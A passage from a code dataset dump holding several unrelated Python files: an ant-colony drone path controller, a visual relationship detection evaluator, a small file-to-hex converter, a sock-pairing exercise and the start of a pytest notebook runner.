INF\n\n for ant in ants:\n if best_fitness > ant.get_fitness():\n best_fitness = ant.get_fitness()\n best_ant = ant\n return best_ant\n\n def epoch(self, ants_count, alpha, beta, q0, rho):\n ants = [Ant(ANT_MOVES, BATTERY_STATUS) for _ in range(ants_count)]\n\n ants = self.move_ants(ants, alpha, beta, q0)\n\n for i in range(SENSOR_COUNT):\n for j in range(SENSOR_COUNT):\n self.pheromones[i][j] = (1 - rho) * self.pheromones[i][j]\n\n if not ants:\n return None\n\n new_pheromones = [1.0 / ant.get_fitness() for ant in ants]\n for i in range(len(ants)):\n current = ants[i].get_path()\n for j in range(len(current)-1):\n current_sensor = current[j]\n next_sensor = current[j+1]\n self.pheromones[current_sensor][next_sensor] += new_pheromones[i]\n\n return self.choose_best_ant(ants)\n\n def charge_sensors(self, battery_status, available_sensors):\n \"\"\"\n after traversing through all the sensors,\n we distribute the remaining battery in order to get the maximum surveyed cells\n :param battery_status: the remaining energy after a traversal\n :param available_sensors:\n :return:\n \"\"\"\n print(\"Battery left after shortest path: \", battery_status)\n sensors = []\n for i in range(len(self.sensors.get_sensor_list())):\n if i in available_sensors:\n sensors.append(self.sensors.get_sensor_list()[i])\n\n energy = [0 for _ in sensors]\n if battery_status <= 0:\n return energy\n\n sensors.sort(key=lambda s: (s.get_accessible_positions()[-1] / s.get_max_energy()))\n i = 0\n while i < len(sensors) and battery_status > 0:\n current_sensor_max_energy = sensors[i].get_max_energy()\n if battery_status > current_sensor_max_energy:\n battery_status -= current_sensor_max_energy\n energy[i] = current_sensor_max_energy\n else:\n energy[i] = battery_status\n battery_status = 0\n i += 1\n return energy\n\n def _iteration(self, best_choice):\n\n current_sol = self.epoch(30, alpha=1.9, beta=0.9, q0=0.5, rho=0.05)\n if current_sol is None:\n return best_choice\n\n length = len(current_sol.get_path())\n if best_choice is None or length > len(best_choice.get_path()) \\\n or (length == len(best_choice.get_path()) and current_sol.get_fitness() < best_choice.get_fitness()):\n return current_sol # new best solution\n return best_choice\n\n def generate_path(self, drone, sensors_path):\n [x, y] = drone.get_coordinates()\n sensor_list = self.sensors.get_sensor_list()\n current_sensor = sensor_list[sensors_path[0]]\n full_path = self.map.searchAStar(x, y, current_sensor.get_x(), current_sensor.get_y())[::-1]\n\n (x, y) = current_sensor.get_coords()\n\n for i in range(1, SENSOR_COUNT):\n current_sensor = sensor_list[sensors_path[i]]\n full_path += self.map.searchAStar(x, y, current_sensor.get_x(), current_sensor.get_y())[::-1]\n (x, y) = current_sensor.get_coords()\n return full_path\n\n def run(self):\n best_choice = None # will be the one with the largest number of visible positions\n for _ in range(1000):\n best_choice = self._iteration(best_choice)\n\n energy = self.charge_sensors(BATTERY_STATUS - best_choice.get_fitness(), best_choice.get_path())\n print('Energy distributed: ', energy)\n print('Best path: ', best_choice.get_path())\n\n return self.generate_path(self.drone, best_choice.get_path())\n\n def view_map(self):\n gui.movingDrone(self.map, self.sensors, self.run())\n\n def get_map(self):\n return self.map\n\n def get_surface(self):\n return self.map.surface\n\n def get_drone_position(self):\n return 
self.drone.get_coordinates()","repo_name":"GeorgeDanicico/Artificial-Intelligence-Year2","sub_path":"Assignment4/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":5728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7542937937","text":"from __future__ import absolute_import\nfrom __future__ import unicode_literals\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport numpy as np\nimport logging\nimport os\nfrom collections import OrderedDict\nimport cPickle as pickle\n\nfrom core.config_rel import cfg\nfrom utils import helpers_rel\nfrom caffe2.python import workspace\n\nlogger = logging.getLogger(__name__)\n\n\nMIN_OVLP = 0.5\n\n\nclass Evaluator():\n\n def __init__(self, split, roidb_size):\n\n self._split = split\n\n self.spo_cnt = 0\n self.tri_top1_cnt = 0\n self.tri_top5_cnt = 0\n self.tri_top10_cnt = 0\n self.sbj_top1_cnt = 0\n self.sbj_top5_cnt = 0\n self.sbj_top10_cnt = 0\n self.obj_top1_cnt = 0\n self.obj_top5_cnt = 0\n self.obj_top10_cnt = 0\n self.rel_top1_cnt = 0\n self.rel_top5_cnt = 0\n self.rel_top10_cnt = 0\n\n self.tri_top1_acc = 0.0\n self.tri_top5_acc = 0.0\n self.tri_top10_acc = 0.0\n self.sbj_top1_acc = 0.0\n self.sbj_top5_acc = 0.0\n self.sbj_top10_acc = 0.0\n self.obj_top1_acc = 0.0\n self.obj_top5_acc = 0.0\n self.obj_top10_acc = 0.0\n self.rel_top1_acc = 0.0\n self.rel_top5_acc = 0.0\n self.rel_top10_acc = 0.0\n\n self.tri_rr = 0.0\n self.sbj_rr = 0.0\n self.obj_rr = 0.0\n self.rel_rr = 0.0\n\n self.tri_mr = 0.0\n self.sbj_mr = 0.0\n self.obj_mr = 0.0\n self.rel_mr = 0.0\n\n self.rank_k = 250\n self.all_rel_k = [1, 10, 70]\n\n self.det_list = \\\n ['image_id', 'image_idx',\n 'boxes_sbj', 'boxes_obj', 'boxes_rel',\n 'labels_sbj', 'labels_obj', 'labels_rel',\n 'scores_sbj', 'scores_obj', 'scores_rel',\n 'gt_labels_sbj', 'gt_labels_obj', 'gt_labels_rel',\n 'gt_boxes_sbj', 'gt_boxes_obj', 'gt_boxes_rel']\n self.all_dets = {key: [] for key in self.det_list}\n\n self.roidb_size = roidb_size\n self.tested = [set() for i in range(roidb_size)]\n\n self.all_det_labels = [[] for _ in self.all_rel_k]\n self.all_det_boxes = [[] for _ in self.all_rel_k]\n self.all_gt_labels = [[] for _ in self.all_rel_k]\n self.all_gt_boxes = [[] for _ in self.all_rel_k]\n\n if cfg.TEST.GET_ALL_LAN_EMBEDDINGS:\n self.all_obj_lan_embds = None\n self.all_prd_lan_embds = None\n if cfg.TEST.GET_ALL_VIS_EMBEDDINGS:\n self.all_sbj_vis_embds = []\n self.all_obj_vis_embds = []\n self.all_prd_vis_embds = []\n\n def reset(self):\n # this should clear out all the metrics computed so far except the\n # best_topN metrics\n logger.info('Resetting {} evaluator...'.format(self._split))\n self.spo_cnt = 0\n self.tri_top1_cnt = 0\n self.tri_top5_cnt = 0\n self.tri_top10_cnt = 0\n self.sbj_top1_cnt = 0\n self.sbj_top5_cnt = 0\n self.sbj_top10_cnt = 0\n self.obj_top1_cnt = 0\n self.obj_top5_cnt = 0\n self.obj_top10_cnt = 0\n self.rel_top1_cnt = 0\n self.rel_top5_cnt = 0\n self.rel_top10_cnt = 0\n\n self.tri_top1_acc = 0.0\n self.tri_top5_acc = 0.0\n self.tri_top10_acc = 0.0\n self.sbj_top1_acc = 0.0\n self.sbj_top5_acc = 0.0\n self.sbj_top10_acc = 0.0\n self.obj_top1_acc = 0.0\n self.obj_top5_acc = 0.0\n self.obj_top10_acc = 0.0\n self.rel_top1_acc = 0.0\n self.rel_top5_acc = 0.0\n self.rel_top10_acc = 0.0\n\n self.tri_rr = 0.0\n self.sbj_rr = 0.0\n self.obj_rr = 0.0\n self.rel_rr = 0.0\n\n self.tri_mr = 0.0\n self.sbj_mr = 0.0\n self.obj_mr = 0.0\n self.rel_mr = 0.0\n\n self.all_dets = {key: [] 
for key in self.det_list}\n\n self.tested = [set() for i in range(self.roidb_size)]\n\n self.all_det_labels = [[] for _ in self.all_rel_k]\n self.all_det_boxes = [[] for _ in self.all_rel_k]\n self.all_gt_labels = [[] for _ in self.all_rel_k]\n self.all_gt_boxes = [[] for _ in self.all_rel_k]\n\n if cfg.TEST.GET_ALL_LAN_EMBEDDINGS:\n self.all_obj_lan_embds = None\n self.all_prd_lan_embds = None\n if cfg.TEST.GET_ALL_VIS_EMBEDDINGS:\n self.all_sbj_vis_embds = []\n self.all_obj_vis_embds = []\n self.all_prd_vis_embds = []\n\n def eval_im_dets_triplet_topk(self):\n\n prefix = 'gpu_' if cfg.DEVICE == 'GPU' else 'cpu_'\n\n if cfg.TEST.GET_ALL_LAN_EMBEDDINGS:\n if self.all_obj_lan_embds is None:\n self.all_obj_lan_embds = workspace.FetchBlob(\n prefix + '{}/{}'.format(cfg.ROOT_DEVICE_ID, 'all_obj_lan_embds'))\n if self.all_prd_lan_embds is None:\n self.all_prd_lan_embds = workspace.FetchBlob(\n prefix + '{}/{}'.format(cfg.ROOT_DEVICE_ID, 'all_prd_lan_embds'))\n\n new_batch_flag = False\n for gpu_id in range(cfg.ROOT_DEVICE_ID, cfg.ROOT_DEVICE_ID + cfg.NUM_DEVICES):\n\n image_idx = workspace.FetchBlob(\n prefix + '{}/{}'.format(gpu_id, 'image_idx'))[0]\n subbatch_id = workspace.FetchBlob(\n prefix + '{}/{}'.format(gpu_id, 'subbatch_id'))[0]\n if subbatch_id in self.tested[image_idx]:\n continue\n new_batch_flag = True\n self.tested[image_idx].add(subbatch_id)\n\n self.all_dets['image_idx'].append(int(image_idx))\n image_id = workspace.FetchBlob(\n prefix + '{}/{}'.format(gpu_id, 'image_id'))[0]\n self.all_dets['image_id'].append(image_id)\n\n scale = \\\n workspace.FetchBlob(prefix + '{}/{}'.format(gpu_id, 'image_scale'))[0]\n gt_labels_sbj = workspace.FetchBlob(prefix + '{}/{}'.format(\n gpu_id, 'sbj_pos_labels_int32'))\n gt_labels_obj = workspace.FetchBlob(prefix + '{}/{}'.format(\n gpu_id, 'obj_pos_labels_int32'))\n gt_labels_rel = workspace.FetchBlob(prefix + '{}/{}'.format(\n gpu_id, 'rel_pos_labels_int32'))\n\n gt_labels_sbj -= 1\n gt_labels_obj -= 1\n gt_labels_rel -= 1\n gt_boxes_sbj = workspace.FetchBlob(prefix + '{}/{}'.format(\n gpu_id, 'sbj_gt_boxes')) / scale\n gt_boxes_obj = workspace.FetchBlob(prefix + '{}/{}'.format(\n gpu_id, 'obj_gt_boxes')) / scale\n gt_boxes_rel = workspace.FetchBlob(prefix + '{}/{}'.format(\n gpu_id, 'rel_gt_boxes')) / scale\n self.all_dets['gt_labels_sbj'].append(gt_labels_sbj)\n self.all_dets['gt_labels_obj'].append(gt_labels_obj)\n self.all_dets['gt_labels_rel'].append(gt_labels_rel)\n self.all_dets['gt_boxes_sbj'].append(gt_boxes_sbj)\n self.all_dets['gt_boxes_obj'].append(gt_boxes_obj)\n self.all_dets['gt_boxes_rel'].append(gt_boxes_rel)\n\n num_proposals = int(workspace.FetchBlob(\n prefix + '{}/{}'.format(gpu_id, 'num_proposals'))[0])\n if num_proposals == 0:\n det_boxes_sbj = np.empty((0, 4), dtype=np.float32)\n det_boxes_obj = np.empty((0, 4), dtype=np.float32)\n det_boxes_rel = np.empty((0, 4), dtype=np.float32)\n det_labels_sbj = np.empty((0, 20), dtype=np.int32)\n det_labels_obj = np.empty((0, 20), dtype=np.int32)\n det_labels_rel = np.empty((0, 20), dtype=np.int32)\n det_scores_sbj = np.empty((0, 20), dtype=np.float32)\n det_scores_obj = np.empty((0, 20), dtype=np.float32)\n det_scores_rel = np.empty((0, 20), dtype=np.float32)\n else:\n det_boxes_sbj = workspace.FetchBlob(prefix + '{}/{}'.format(\n gpu_id, 'sbj_rois'))[:, 1:] / scale\n det_boxes_obj = workspace.FetchBlob(prefix + '{}/{}'.format(\n gpu_id, 'obj_rois'))[:, 1:] / scale\n det_boxes_rel = workspace.FetchBlob(prefix + '{}/{}'.format(\n gpu_id, 'rel_rois_prd'))[:, 1:] / scale\n 
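# pull the per-ROI top-k label and score matrices produced by the model heads\n 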
det_labels_sbj = \\\n workspace.FetchBlob(prefix + '{}/{}'.format(gpu_id, 'labels_sbj'))\n det_labels_obj = \\\n workspace.FetchBlob(prefix + '{}/{}'.format(gpu_id, 'labels_obj'))\n det_labels_rel = \\\n workspace.FetchBlob(prefix + '{}/{}'.format(gpu_id, 'labels_rel'))\n det_scores_sbj = \\\n workspace.FetchBlob(prefix + '{}/{}'.format(gpu_id, 'scores_sbj'))\n det_scores_obj = \\\n workspace.FetchBlob(prefix + '{}/{}'.format(gpu_id, 'scores_obj'))\n det_scores_rel = \\\n workspace.FetchBlob(prefix + '{}/{}'.format(gpu_id, 'scores_rel'))\n self.all_dets['boxes_sbj'].append(det_boxes_sbj)\n self.all_dets['boxes_obj'].append(det_boxes_obj)\n self.all_dets['boxes_rel'].append(det_boxes_rel)\n self.all_dets['labels_sbj'].append(det_labels_sbj)\n self.all_dets['labels_obj'].append(det_labels_obj)\n self.all_dets['labels_rel'].append(det_labels_rel)\n self.all_dets['scores_sbj'].append(det_scores_sbj)\n self.all_dets['scores_obj'].append(det_scores_obj)\n self.all_dets['scores_rel'].append(det_scores_rel)\n\n if cfg.TEST.GET_ALL_VIS_EMBEDDINGS:\n embds_sbj = workspace.FetchBlob(prefix + '{}/{}'.format(\n gpu_id, 'x_sbj'))\n embds_obj = workspace.FetchBlob(prefix + '{}/{}'.format(\n gpu_id, 'x_obj'))\n embds_prd = workspace.FetchBlob(prefix + '{}/{}'.format(\n gpu_id, 'x_rel'))\n self.all_sbj_vis_embds.append(embds_sbj)\n self.all_obj_vis_embds.append(embds_obj)\n self.all_prd_vis_embds.append(embds_prd)\n\n if self._split != 'test':\n self.spo_cnt += len(gt_labels_sbj)\n for ind in range(len(gt_labels_sbj)):\n if gt_labels_sbj[ind] in det_labels_sbj[ind, :1] and \\\n gt_labels_obj[ind] in det_labels_obj[ind, :1] and \\\n gt_labels_rel[ind] in det_labels_rel[ind, :1]:\n self.tri_top1_cnt += 1\n if gt_labels_sbj[ind] in det_labels_sbj[ind, :1]:\n self.sbj_top1_cnt += 1\n if gt_labels_obj[ind] in det_labels_obj[ind, :1]:\n self.obj_top1_cnt += 1\n if gt_labels_rel[ind] in det_labels_rel[ind, :1]:\n self.rel_top1_cnt += 1\n\n if gt_labels_sbj[ind] in det_labels_sbj[ind, :5] and \\\n gt_labels_obj[ind] in det_labels_obj[ind, :5] and \\\n gt_labels_rel[ind] in det_labels_rel[ind, :5]:\n self.tri_top5_cnt += 1\n if gt_labels_sbj[ind] in det_labels_sbj[ind, :5]:\n self.sbj_top5_cnt += 1\n if gt_labels_obj[ind] in det_labels_obj[ind, :5]:\n self.obj_top5_cnt += 1\n if gt_labels_rel[ind] in det_labels_rel[ind, :5]:\n self.rel_top5_cnt += 1\n\n if gt_labels_sbj[ind] in det_labels_sbj[ind, :10] and \\\n gt_labels_obj[ind] in det_labels_obj[ind, :10] and \\\n gt_labels_rel[ind] in det_labels_rel[ind, :10]:\n self.tri_top10_cnt += 1\n if gt_labels_sbj[ind] in det_labels_sbj[ind, :10]:\n self.sbj_top10_cnt += 1\n if gt_labels_obj[ind] in det_labels_obj[ind, :10]:\n self.obj_top10_cnt += 1\n if gt_labels_rel[ind] in det_labels_rel[ind, :10]:\n self.rel_top10_cnt += 1\n\n s_correct = gt_labels_sbj[ind] in det_labels_sbj[ind,:self.rank_k]\n p_correct = gt_labels_rel[ind] in det_labels_rel[ind,:self.rank_k]\n o_correct = gt_labels_obj[ind] in det_labels_obj[ind,:self.rank_k]\n spo_correct = s_correct and p_correct and o_correct\n s_ind = np.where(\n det_labels_sbj[ind,:self.rank_k].squeeze() == \\\n gt_labels_sbj[ind])[0]\n p_ind = np.where(\n det_labels_rel[ind,:self.rank_k].squeeze() == \\\n gt_labels_rel[ind])[0]\n o_ind = np.where(\n det_labels_obj[ind,:self.rank_k].squeeze() == \\\n gt_labels_obj[ind])[0]\n\n self.sbj_mr += 1\n self.rel_mr += 1\n self.obj_mr += 1\n self.tri_mr += 1\n if s_correct:\n s_ind = s_ind[0]\n self.sbj_rr += 1.0 / (s_ind + 1.0)\n self.sbj_mr += s_ind / float(self.rank_k) - 1\n if 
p_correct:\n p_ind = p_ind[0]\n self.rel_rr += 1.0 / (p_ind + 1.0)\n self.rel_mr += p_ind / float(self.rank_k) - 1\n if o_correct:\n o_ind = o_ind[0]\n self.obj_rr += 1.0 / (o_ind + 1.0)\n self.obj_mr += o_ind / float(self.rank_k) - 1\n if spo_correct:\n self.tri_rr += (1.0 / (s_ind + 1.0) + \\\n 1.0 / (p_ind + 1.0) + \\\n 1.0 / (o_ind + 1.0)) / 3.0\n self.tri_mr += (s_ind / float(self.rank_k) - 1 + \\\n p_ind / float(self.rank_k) - 1 + \\\n o_ind / float(self.rank_k) - 1) / 3.0\n\n sbj_k = 1\n # rel_k = 70\n obj_k = 1\n # det_labels = []\n # det_boxes = []\n # gt_labels = []\n # gt_boxes = []\n for i, rel_k in enumerate(self.all_rel_k):\n if det_labels_sbj.shape[0] > 0:\n topk_labels_sbj = det_labels_sbj[:, :sbj_k]\n topk_labels_rel = det_labels_rel[:, :rel_k]\n topk_labels_obj = det_labels_obj[:, :obj_k]\n else: # In the ECCV2016 proposals sometimes there is no det box\n topk_labels_sbj = np.zeros((0, sbj_k), dtype=np.int32)\n topk_labels_rel = np.zeros((0, rel_k), dtype=np.int32)\n topk_labels_obj = np.zeros((0, obj_k), dtype=np.int32)\n\n if det_scores_sbj.shape[0] > 0:\n topk_scores_sbj = det_scores_sbj[:, :sbj_k]\n topk_scores_rel = det_scores_rel[:, :rel_k]\n topk_scores_obj = det_scores_obj[:, :obj_k]\n else: # In the ECCV2016 proposals sometimes there is no det box\n topk_scores_sbj = np.zeros((0, sbj_k), dtype=np.float32)\n topk_scores_rel = np.zeros((0, rel_k), dtype=np.float32)\n topk_scores_obj = np.zeros((0, obj_k), dtype=np.float32)\n\n topk_cube_spo_labels = np.zeros(\n (topk_labels_sbj.shape[0], sbj_k * obj_k * rel_k, 3), dtype=np.int32)\n topk_cube_spo_scores = np.zeros(\n (topk_labels_sbj.shape[0], sbj_k * obj_k * rel_k), dtype=np.float32)\n topk_cube_p_scores = np.zeros(\n (topk_labels_sbj.shape[0], sbj_k * obj_k * rel_k), dtype=np.float32)\n for l in range(sbj_k):\n for m in range(rel_k):\n for n in range(obj_k):\n topk_cube_spo_labels[:, l * rel_k * obj_k + m * obj_k + n, 0] = \\\n topk_labels_sbj[:, l]\n topk_cube_spo_labels[:, l * rel_k * obj_k + m * obj_k + n, 1] = \\\n topk_labels_rel[:, m]\n topk_cube_spo_labels[:, l * rel_k * obj_k + m * obj_k + n, 2] = \\\n topk_labels_obj[:, n]\n topk_cube_spo_scores[:, l * rel_k * obj_k + m * obj_k + n] = \\\n np.exp(topk_scores_sbj[:, l] +\n topk_scores_rel[:, m] +\n topk_scores_obj[:, n])\n\n topk_cube_p_scores[:, l * rel_k * obj_k + m * obj_k + n] = \\\n np.exp(topk_scores_rel[:, m])\n\n topk_cube_spo_labels_reshape = topk_cube_spo_labels.reshape((-1, 3))\n topk_cube_spo_scores_reshape = topk_cube_spo_scores.reshape((-1, 1))\n\n self.all_det_labels[i].append(\n np.concatenate((topk_cube_spo_scores_reshape[:, 0, np.newaxis],\n topk_cube_spo_labels_reshape[:, 0, np.newaxis],\n topk_cube_spo_labels_reshape[:, 1, np.newaxis],\n topk_cube_spo_labels_reshape[:, 2, np.newaxis]),\n axis=1))\n self.all_det_boxes[i].append(np.repeat(\n np.concatenate((det_boxes_sbj[:, np.newaxis, :],\n det_boxes_obj[:, np.newaxis, :]),\n axis=1), sbj_k * rel_k * obj_k, axis=0))\n self.all_gt_labels[i].append(\n np.concatenate((gt_labels_sbj[:, np.newaxis],\n gt_labels_rel[:, np.newaxis],\n gt_labels_obj[:, np.newaxis]),\n axis=1))\n self.all_gt_boxes[i].append(\n np.concatenate((gt_boxes_sbj[:, np.newaxis, :],\n gt_boxes_obj[:, np.newaxis, :]),\n axis=1))\n\n return new_batch_flag\n\n def calculate_and_plot_accuracy(self):\n\n if self._split != 'test':\n self.tri_top1_acc = float(self.tri_top1_cnt) / float(self.spo_cnt) * 100\n self.tri_top5_acc = float(self.tri_top5_cnt) / float(self.spo_cnt) * 100\n self.tri_top10_acc = float(self.tri_top10_cnt) / 
float(self.spo_cnt) * 100\n self.sbj_top1_acc = float(self.sbj_top1_cnt) / float(self.spo_cnt) * 100\n self.sbj_top5_acc = float(self.sbj_top5_cnt) / float(self.spo_cnt) * 100\n self.sbj_top10_acc = float(self.sbj_top10_cnt) / float(self.spo_cnt) * 100\n self.obj_top1_acc = float(self.obj_top1_cnt) / float(self.spo_cnt) * 100\n self.obj_top5_acc = float(self.obj_top5_cnt) / float(self.spo_cnt) * 100\n self.obj_top10_acc = float(self.obj_top10_cnt) / float(self.spo_cnt) * 100\n self.rel_top1_acc = float(self.rel_top1_cnt) / float(self.spo_cnt) * 100\n self.rel_top5_acc = float(self.rel_top5_cnt) / float(self.spo_cnt) * 100\n self.rel_top10_acc = float(self.rel_top10_cnt) / float(self.spo_cnt) * 100\n self.sbj_mr /= float(self.spo_cnt) / 100\n self.rel_mr /= float(self.spo_cnt) / 100\n self.obj_mr /= float(self.spo_cnt) / 100\n self.tri_mr /= float(self.spo_cnt) / 100\n self.sbj_rr /= float(self.spo_cnt) / 100\n self.rel_rr /= float(self.spo_cnt) / 100\n self.obj_rr /= float(self.spo_cnt) / 100\n self.tri_rr /= float(self.spo_cnt) / 100\n\n print('triplet top 1 accuracy: {:f}'.format(self.tri_top1_acc))\n print('triplet top 5 accuracy: {:f}'.format(self.tri_top5_acc))\n print('triplet top 10 accuracy: {:f}'.format(self.tri_top10_acc))\n print('triplet rr: {:f}'.format(self.tri_rr))\n print('triplet mr: {:f}'.format(self.tri_mr))\n\n print('sbj top 1 accuracy: {:f}'.format(self.sbj_top1_acc))\n print('sbj top 5 accuracy: {:f}'.format(self.sbj_top5_acc))\n print('sbj top 10 accuracy: {:f}'.format(self.sbj_top10_acc))\n print('sbj rr: {:f}'.format(self.sbj_rr))\n print('sbj mr: {:f}'.format(self.sbj_mr))\n\n print('obj top 1 accuracy: {:f}'.format(self.obj_top1_acc))\n print('obj top 5 accuracy: {:f}'.format(self.obj_top5_acc))\n print('obj top 10 accuracy: {:f}'.format(self.obj_top10_acc))\n print('obj rr: {:f}'.format(self.obj_rr))\n print('obj mr: {:f}'.format(self.obj_mr))\n\n print('rel top 1 accuracy: {:f}'.format(self.rel_top1_acc))\n print('rel top 5 accuracy: {:f}'.format(self.rel_top5_acc))\n print('rel top 10 accuracy: {:f}'.format(self.rel_top10_acc))\n print('rel rr: {:f}'.format(self.rel_rr))\n print('rel mr: {:f}'.format(self.rel_mr))\n\n all_accs = {}\n for key, val in self.__dict__.items():\n if key.find('acc') >= 0:\n all_accs[key] = val\n return all_accs\n\n def save_all_dets(self):\n\n output_dir = helpers_rel.get_output_directory()\n det_path = os.path.join(\n output_dir,\n cfg.DATASET,\n cfg.MODEL.TYPE, cfg.MODEL.SUBTYPE, cfg.MODEL.SPECS, cfg.TEST.DATA_TYPE)\n if not os.path.exists(det_path):\n os.makedirs(det_path)\n det_name = 'reldn_detections.pkl'\n det_file = os.path.join(det_path, det_name)\n logger.info('all_dets size: {}'.format(len(self.all_dets['labels_sbj'])))\n with open(det_file, 'wb') as f:\n pickle.dump(self.all_dets, f, pickle.HIGHEST_PROTOCOL)\n logger.info('Wrote reldn detections to {}'.format(os.path.abspath(det_file)))\n\n if cfg.TEST.GET_ALL_LAN_EMBEDDINGS:\n all_obj_lan_embds_name = 'all_obj_lan_embds.pkl'\n all_obj_lan_embds_file = os.path.join(det_path, all_obj_lan_embds_name)\n logger.info('all_obj_lan_embds size: {}'.format(\n self.all_obj_lan_embds.shape[0]))\n with open(all_obj_lan_embds_file, 'wb') as f:\n pickle.dump(self.all_obj_lan_embds, f, pickle.HIGHEST_PROTOCOL)\n logger.info('Wrote all_obj_lan_embds to {}'.format(\n os.path.abspath(all_obj_lan_embds_file)))\n\n all_prd_lan_embds_name = 'all_prd_lan_embds.pkl'\n all_prd_lan_embds_file = os.path.join(det_path, all_prd_lan_embds_name)\n logger.info('all_prd_lan_embds size: {}'.format(\n 
self.all_prd_lan_embds.shape[0]))\n with open(all_prd_lan_embds_file, 'wb') as f:\n pickle.dump(self.all_prd_lan_embds, f, pickle.HIGHEST_PROTOCOL)\n logger.info('Wrote all_prd_lan_embds to {}'.format(\n os.path.abspath(all_prd_lan_embds_file)))\n\n if cfg.TEST.GET_ALL_VIS_EMBEDDINGS:\n all_sbj_vis_embds_name = 'all_sbj_vis_embds.pkl'\n all_sbj_vis_embds_file = os.path.join(det_path, all_sbj_vis_embds_name)\n logger.info('all_sbj_vis_embds size: {}'.format(\n len(self.all_sbj_vis_embds)))\n with open(all_sbj_vis_embds_file, 'wb') as f:\n pickle.dump(self.all_sbj_vis_embds, f, pickle.HIGHEST_PROTOCOL)\n logger.info('Wrote all_sbj_vis_embds to {}'.format(\n os.path.abspath(all_sbj_vis_embds_file)))\n\n all_obj_vis_embds_name = 'all_obj_vis_embds.pkl'\n all_obj_vis_embds_file = os.path.join(det_path, all_obj_vis_embds_name)\n logger.info('all_obj_vis_embds size: {}'.format(\n len(self.all_obj_vis_embds)))\n with open(all_obj_vis_embds_file, 'wb') as f:\n pickle.dump(self.all_obj_vis_embds, f, pickle.HIGHEST_PROTOCOL)\n logger.info('Wrote all_obj_vis_embds to {}'.format(\n os.path.abspath(all_obj_vis_embds_file)))\n\n all_prd_vis_embds_name = 'all_prd_vis_embds.pkl'\n all_prd_vis_embds_file = os.path.join(det_path, all_prd_vis_embds_name)\n logger.info('all_prd_vis_embds size: {}'.format(\n len(self.all_prd_vis_embds)))\n with open(all_prd_vis_embds_file, 'wb') as f:\n pickle.dump(self.all_prd_vis_embds, f, pickle.HIGHEST_PROTOCOL)\n logger.info('Wrote all_prd_vis_embds to {}'.format(\n os.path.abspath(all_prd_vis_embds_file)))\n","repo_name":"facebookresearch/Large-Scale-VRD","sub_path":"lib/utils/evaluator_rel.py","file_name":"evaluator_rel.py","file_ext":"py","file_size_in_byte":24671,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"21"} +{"seq_id":"8319309591","text":"import base64\nimport struct\nimport binascii\ndef convertFileToOneAndZero(path):\n\n\n f = open(path,'rb')\n for chunk in iter(lambda: f.read(), b''):\n #print(''.join(['{:08b}'.format(c) for c in chunk]), end='')\n a = ''.join(['{:08b}'.format(c) for c in chunk]) # zero-pad each byte to 8 bits so leading zeros survive\n #hexstr = binascii.b2a_hex(a)\n #print(hexstr)\n #b=int(a,2)\n #print(hex(int(a,2)))\n text = hex(int(a,2))\n b_text = bytes(text, encoding=\"utf8\")\n print(b_text)\n print(todecond(text))\n\n\ndef todecond(a):\n if a.startswith('0x'):\n a = a[2:] # drop the '0x' prefix that hex() adds before pairing up digits\n return ''.join([chr(int(b, 16)) for b in [a[i:i + 2] for i in range(0, len(a), 2)]])\nif __name__ == '__main__':\n path ='C:/Users/hp/Desktop/package-lock.json'\n convertFileToOneAndZero(path)","repo_name":"JKFjkf/Practise","sub_path":"文本转换/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16445506295","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'sockMerchant' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts following parameters:\n# 1. INTEGER n\n# 2. 
INTEGER_ARRAY ar\n#\n\ndef sockMerchant(n, ar):\n # Write your code here\n pairCount = 0 \n seen = {}\n # iterate through the list\n # if not seen in {}, add it to {}\n for sock in ar:\n if sock not in seen:\n seen[sock] = 1\n else:\n seen[sock] += 1\n \n for k, v in seen.items():\n pairCount += v // 2 # integer division counts whole pairs whether v is even or odd\n print(seen)\n return pairCount\n\nif __name__ == '__main__':\n # fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = 9\n\n ar = [10, 20, 20, 10, 10, 30, 50, 10, 20]\n\n result = sockMerchant(n, ar)\n print(result)\n # fptr.write(str(result) + '\\n')\n\n # fptr.close()\n","repo_name":"tinkitwong/hackerrrank","sub_path":"InterviewPrepKit/WarmUp/socks.py","file_name":"socks.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"41000980310","text":"\"\"\" Run multiple notebooks. \"\"\"\n# pylint: disable=import-error\nimport os\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"6\"\n\nimport warnings\nfrom glob import glob\nimport pytest\nimport torch\n\n\n\nNO_GPU = pytest.mark.skipif(not torch.cuda.is_available(), reason='No GPU')\n\nNOTEBOOKS_DIR = './notebooks/'\nNOTEBOOKS = glob(NOTEBOOKS_DIR + '*.ipynb')\n\nTUTORIALS_DIR = './../../examples/tutorials/'\nTUTORIALS = glob(TUTORIALS_DIR + '*.ipynb')\nALLOWED_TUTORIALS = [\n '01',\n '02', # quite long\n # '03', # very long\n '04',\n '07',\n # '10', # requires `multiprocess` module\n]\n\nMICROBATCH_LIST = [None, 8] # each integer value must be a divisor of 16\nDEVICE_LIST = ['CPU:0', pytest.param('GPU:*', marks=NO_GPU)] # set your own value(s) for used devices\n\nPARAMETERS = []\n# Run every notebook in test directory for every combination of microbatching\nPARAMETERS += [(path, mb) for path in NOTEBOOKS\n for mb in MICROBATCH_LIST]\n\n# Run selected notebooks inside tutorials dir without microbatching\nPARAMETERS += [(path, None) for path in TUTORIALS\n if path.split('/')[-1][:2] in ALLOWED_TUTORIALS]\n\n_ = [print(item) for item in PARAMETERS]\n\n\n# Some of the actions are appropriate in notebooks, but better be ignored in tests\nBAD_PREFIXES = ['get_ipython', 'plt', 'plot', 'figure', 'ax.',]\n\n\n@pytest.mark.slow\n@pytest.mark.parametrize('path, microbatch', PARAMETERS)\n@pytest.mark.parametrize('device', DEVICE_LIST)\ndef test_run_notebooks(path, microbatch, device):\n \"\"\" There are a lot of examples in different notebooks, and all of them should be working.\n\n Parameters\n 